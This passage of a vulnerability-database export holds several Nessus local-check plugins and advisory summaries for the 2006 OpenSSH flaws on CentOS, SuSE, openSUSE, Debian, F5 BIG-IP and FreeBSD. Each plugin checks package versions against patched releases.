value:\"p-cpe:/a:centos:centos:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl096b\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssh-3.6.1p2-33.30.12\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssh-askpass-3.6.1p2-33.30.12\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssh-askpass-gnome-3.6.1p2-33.30.12\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssh-clients-3.6.1p2-33.30.12\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssh-server-3.6.1p2-33.30.12\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"openssh-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"openssh-askpass-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"openssh-askpass-gnome-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"openssh-clients-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"openssh-server-3.9p1-8.RHEL4.17\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"openssl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:32", "bulletinFamily": "scanner", "description": "Several security problems were fixed in OpenSSH :\n\n - A denial of service problem has been fixed in OpenSSH which could be used to cause lots of CPU consumption on a remote openssh server. (CVE-2006-4924)\n\n - If a remote attacker is able to inject network traffic this could be used to cause a client connection to close. (CVE-2006-4925)\n\n - Fixed an unsafe signal hander reported by Mark Dowd. The signal handler was vulnerable to a race condition that could be exploited to perform a pre-authentication denial of service. This vulnerability could theoretically lead to pre-authentication remote code execution if GSSAPI authentication is enabled, but the likelihood of successful exploitation appears remote.\n (CVE-2006-5051)\n\n - Fixed a GSSAPI authentication abort that could be used to determine the validity of usernames on some platforms. (CVE-2006-5052)", "modified": "2016-12-22T00:00:00", "id": "SUSE_OPENSSH-2184.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29538", "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : OpenSSH (ZYPP Patch Number 2184)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29538);\n script_version (\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:28 $\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-4925\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSH (ZYPP Patch Number 2184)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security problems were fixed in OpenSSH :\n\n - A denial of service problem has been fixed in OpenSSH\n which could be used to cause lots of CPU consumption on\n a remote openssh server. (CVE-2006-4924)\n\n - If a remote attacker is able to inject network traffic\n this could be used to cause a client connection to\n close. (CVE-2006-4925)\n\n - Fixed an unsafe signal hander reported by Mark Dowd. The\n signal handler was vulnerable to a race condition that\n could be exploited to perform a pre-authentication\n denial of service. This vulnerability could\n theoretically lead to pre-authentication remote code\n execution if GSSAPI authentication is enabled, but the\n likelihood of successful exploitation appears remote.\n (CVE-2006-5051)\n\n - Fixed a GSSAPI authentication abort that could be used\n to determine the validity of usernames on some\n platforms. (CVE-2006-5052)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-4924.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-4925.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-5051.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-5052.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2184.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssh-4.2p1-18.9\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssh-askpass-4.2p1-18.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssh-4.2p1-18.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssh-askpass-4.2p1-18.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:12", "bulletinFamily": "scanner", "description": "Several security problems were fixed in OpenSSH :\n\n - CVE-2006-4924: A denial of service problem has been fixed in OpenSSH which could be used to cause lots of CPU consumption on a remote openssh server.\n\n - CVE-2006-4925: If a remote attacker is able to inject network traffic this could be used to cause a client connection to close.\n\n - CVE-2006-5051: Fixed an unsafe signal hander reported by Mark Dowd. The signal handler was vulnerable to a race condition that could be exploited to perform a pre-authentication denial of service. This vulnerability could theoretically lead to pre-authentication remote code execution if GSSAPI authentication is enabled, but the likelihood of successful exploitation appears remote.\n\n - CVE-2006-5052: Fixed a GSSAPI authentication abort that could be used to determine the validity of usernames on some platforms.", "modified": "2018-07-19T00:00:00", "id": "SUSE_OPENSSH-2183.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27365", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : openssh (openssh-2183)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openssh-2183.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27365);\n script_version (\"1.12\");\n script_cvs_date(\"Date: 2018/07/19 23:54:24\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-4925\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n\n script_name(english:\"openSUSE 10 Security Update : openssh (openssh-2183)\");\n script_summary(english:\"Check for the openssh-2183 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security problems were fixed in OpenSSH :\n\n - CVE-2006-4924: A denial of service problem has been\n fixed in OpenSSH which could be used to cause lots of\n CPU consumption on a remote openssh server.\n\n - CVE-2006-4925: If a remote attacker is able to inject\n network traffic this could be used to cause a client\n connection to close.\n\n - CVE-2006-5051: Fixed an unsafe signal hander reported by\n Mark Dowd. The signal handler was vulnerable to a race\n condition that could be exploited to perform a\n pre-authentication denial of service. This vulnerability\n could theoretically lead to pre-authentication remote\n code execution if GSSAPI authentication is enabled, but\n the likelihood of successful exploitation appears\n remote.\n\n - CVE-2006-5052: Fixed a GSSAPI authentication abort that\n could be used to determine the validity of usernames on\n some platforms.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssh-4.2p1-18.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssh-askpass-4.2p1-18.9\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:30", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in OpenSSH, a free implementation of the Secure Shell protocol, which may lead to denial of service and potentially the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2006-4924 Tavis Ormandy of the Google Security Team discovered a denial of service vulnerability in the mitigation code against complexity attacks, which might lead to increased CPU consumption until a timeout is triggered.\n This is only exploitable if support for SSH protocol version 1 is enabled.\n\n - CVE-2006-5051 Mark Dowd discovered that insecure signal handler usage could potentially lead to execution of arbitrary code through a double free. The Debian Security Team doesn't believe the general openssh package without Kerberos support to be exploitable by this issue. However, due to the complexity of the underlying code we will issue an update to rule out all eventualities.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-1189.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22731", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1189-1 : openssh-krb5 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1189. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22731);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_xref(name:\"DSA\", value:\"1189\");\n\n script_name(english:\"Debian DSA-1189-1 : openssh-krb5 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in OpenSSH, a free\nimplementation of the Secure Shell protocol, which may lead to denial\nof service and potentially the execution of arbitrary code. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2006-4924\n Tavis Ormandy of the Google Security Team discovered a\n denial of service vulnerability in the mitigation code\n against complexity attacks, which might lead to\n increased CPU consumption until a timeout is triggered.\n This is only exploitable if support for SSH protocol\n version 1 is enabled.\n\n - CVE-2006-5051\n Mark Dowd discovered that insecure signal handler usage\n could potentially lead to execution of arbitrary code\n through a double free. The Debian Security Team doesn't\n believe the general openssh package without Kerberos\n support to be exploitable by this issue. However, due to\n the complexity of the underlying code we will issue an\n update to rule out all eventualities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-5051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1189\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssh-krb5 packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 3.8.1p1-7sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"ssh-krb5\", reference:\"3.8.1p1-7sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:25:57", "bulletinFamily": "scanner", "description": "The remote BIG-IP device is missing a patch required by a security advisory.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL6736.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=88441", "published": "2016-01-28T00:00:00", "title": "F5 Networks BIG-IP : OpenSSH vulnerabilities (SOL6736)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL6736.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88441);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_bugtraq_id(20216, 20241);\n\n script_name(english:\"F5 Networks BIG-IP : OpenSSH vulnerabilities (SOL6736)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K6736\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL6736.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL6736\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.99\",\"9.4.0-9.4.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3.0\",\"9.4.2-9.4.8\",\"10.0.0\",\"11.0.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.0-9.2.99\",\"9.4.0-9.4.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.3.0\",\"9.4.2-9.4.8\",\"10.0.0\",\"11.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.0-9.2.99\",\"9.4.0-9.4.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3.0\",\"9.4.2-9.4.8\",\"10.0.0\",\"11.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.0.99\",\"9.1.0-9.1.99\",\"9.2.0-9.2.99\",\"9.4.0-9.4.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3.0\",\"9.4.2-9.4.8\",\"9.6.0\",\"10.0.0\",\"11.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:25", "bulletinFamily": "scanner", "description": "Problem Description The CRC compensation attack detector in the sshd(8) daemon, upon receipt of duplicate blocks, uses CPU time cubic in the number of duplicate blocks received. [CVE-2006-4924]\n\nA race condition exists in a signal handler used by the sshd(8) daemon to handle the LoginGraceTime option, which can potentially cause some cleanup routines to be executed multiple times. [CVE-2006-5051] Impact An attacker sending specially crafted packets to sshd(8) can cause a Denial of Service by using 100% of CPU time until a connection timeout occurs. Since this attack can be performed over multiple connections simultaneously, it is possible to cause up to MaxStartups (10 by default) sshd processes to use all the CPU time they can obtain.\n[CVE-2006-4924]\n\nThe OpenSSH project believe that the race condition can lead to a Denial of Service or potentially remote code execution, but the FreeBSD Security Team has been unable to verify the exact impact.\n[CVE-2006-5051] Workaround The attack against the CRC compensation attack detector can be avoided by disabling SSH Protocol version 1 support in sshd_config(5).\n\nThere is no workaround for the second issue.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_32DB37A550C311DBACF3000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22488", "published": "2006-10-02T00:00:00", "title": "FreeBSD : openssh -- multiple vulnerabilities (32db37a5-50c3-11db-acf3-000c6ec775d9)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22488);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/10 11:49:40\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_bugtraq_id(20216, 20241);\n script_xref(name:\"FreeBSD\", value:\"SA-06:22.openssh\");\n\n script_name(english:\"FreeBSD : openssh -- multiple vulnerabilities (32db37a5-50c3-11db-acf3-000c6ec775d9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Problem Description The CRC compensation attack detector in the\nsshd(8) daemon, upon receipt of duplicate blocks, uses CPU time cubic\nin the number of duplicate blocks received. [CVE-2006-4924]\n\nA race condition exists in a signal handler used by the sshd(8) daemon\nto handle the LoginGraceTime option, which can potentially cause some\ncleanup routines to be executed multiple times. [CVE-2006-5051] Impact\nAn attacker sending specially crafted packets to sshd(8) can cause a\nDenial of Service by using 100% of CPU time until a connection timeout\noccurs. Since this attack can be performed over multiple connections\nsimultaneously, it is possible to cause up to MaxStartups (10 by\ndefault) sshd processes to use all the CPU time they can obtain.\n[CVE-2006-4924]\n\nThe OpenSSH project believe that the race condition can lead to a\nDenial of Service or potentially remote code execution, but the\nFreeBSD Security Team has been unable to verify the exact impact.\n[CVE-2006-5051] Workaround The attack against the CRC compensation\nattack detector can be avoided by disabling SSH Protocol version 1\nsupport in sshd_config(5).\n\nThere is no workaround for the second issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openssh.com/txt/release-4.4\"\n );\n # https://vuxml.freebsd.org/freebsd/32db37a5-50c3-11db-acf3-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c045b020\"\n );\n 